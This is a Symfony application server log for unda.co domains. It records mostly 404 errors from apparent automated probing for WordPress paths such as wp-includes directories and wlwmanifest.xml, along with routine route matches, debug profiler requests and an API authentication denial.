[2025-12-15 23:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/html-api/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/html-api/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/crystal/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/crystal/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/media/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/media/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/smilies/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/smilies/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/wlw/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/wlw/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/codemirror/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/codemirror/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/php-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/php-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/random_compat/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/random_compat/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/endpoints/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/endpoints/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/search/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/search/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sitemaps/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sitemaps/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sitemaps/providers/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sitemaps/providers/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sodium_compat/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sodium_compat/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sodium_compat/src/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sodium_compat/src/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:52:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-15 23:59:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 00:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1269e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/a1269e?panel=time","method":"GET"} []
[2025-12-16 00:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 00:02:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-16 00:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
[2025-12-16 00:06:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 00:07:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=request","method":"GET"} []
[2025-12-16 00:07:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 00:09:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465a2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/465a2b","method":"GET"} []
[2025-12-16 00:09:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 00:12:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fee13f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fee13f","method":"GET"} []
[2025-12-16 00:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 00:22:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c1cb44","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c1cb44?panel=time","method":"GET"} []
[2025-12-16 00:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 00:26:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:32:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 00:32:35] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 00:32:35] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 00:32:35] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 00:32:35] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 00:32:35] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 00:32:35] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 00:42:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=exception","method":"GET"} []
[2025-12-16 00:42:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 00:43:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/'+link+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/'+link+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:46:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 00:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 00:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //website/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //website/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //news/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //news/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2018/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2018/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
